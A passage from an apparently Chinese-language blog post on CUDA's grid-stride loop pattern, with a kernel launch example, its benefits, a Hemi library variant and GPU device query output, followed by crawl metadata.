on\nfor (int i = index; i < n; i += stride)\nc[i] = a[i] + b[i];\n}\n\n#define ARRAYSIZE 1000000\n#define BLOCKSIZE 1024 // can be any size, better be multiple of 32\n#define GRIDSIZE 10 // can be any size, better be multipel of multiprocessor count\n\n__host__\nint main()\n{\n// ...\naddArray_gird_loop <<<GRIDSIZE, BLOCKSIZE >>> (ARRAYSIZE, A, B, C);\n// ...\n}\n\n• 伸缩性与线程复用。可扩展性是指,这种方法在理论上可以支持任意规模的并行计算,而不受设备提供的最大线程数限制;另外这种实现允许我们采用更合理的 GRIDSIZE,比如常推荐的,使用 multiprocessor 数量的倍数。线程复用则可以帮助程序省去线程启动与销毁的开销。\n• 易于调试。如上文所述,当 GRIDSIZEBLOCKSIZE 都取 1 时程序实际退化为串行程序,这为调试提供了方便(例如在 kernel 中使用 printf 可以得到顺序的结果)。\n• 可移植性与可读性。这种的写法可以轻易地修改为 CPU 代码,另外还有类似 Hemi 这样的库专门为 Grid-Stride Loop 提供支持,带来了 C++ 11 风格的循环语法:\n\nHEMI_LAUNCHABLE\nvoid addArray(int n, float* a, float* b, float* c)\n{\nfor (auto i : hemi::grid_stride_range(0, n))\nc[i] = a[i] + b[i];\n}\n\n### In real world\n\nCUDA Driver Version / Runtime Version 9.0 / 9.0\nCUDA Capability Major/Minor version number: 6.1\nMaximum number of threads per multiprocessor: 2048\nMaximum number of threads per block: 1024\nMax dimension size of a thread block (x,y,z): (1024, 1024, 64)\nMax dimension size of a grid size (x,y,z): (2147483647, 65535, 65535)" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.6754639,"math_prob":0.992354,"size":3902,"snap":"2020-10-2020-16","text_gpt3_token_len":1944,"char_repetition_ratio":0.104669064,"word_repetition_ratio":0.2172352,"special_character_ratio":0.3075346,"punctuation_ratio":0.12068965,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99085623,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-06T23:42:33Z\",\"WARC-Record-ID\":\"<urn:uuid:c2825c51-55e3-4466-9a7a-f3bd928bca96>\",\"Content-Length\":\"36985\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9fff954d-743c-43a0-8e3c-f3f002d5a00a>\",\"WARC-Concurrent-To\":\"<urn:uuid:406a482c-cea0-4960-8d55-0099afbed2ed>\",\"WARC-IP-Address\":\"69.28.62.190\",\"WARC-Target-URI\":\"https://blog.imalan.cn/archives/446/\",\"WARC-Payload-Digest\":\"sha1:KW3QXZXH4QZPOVVLMLH3XLTJN5JCQHI7\",\"WARC-Block-Digest\":\"sha1:WFOO5QGSCNULZDWOVAPEATBZQ26N7CNO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585371662966.69_warc_CC-MAIN-20200406231617-20200407022117-00457.warc.gz\"}"}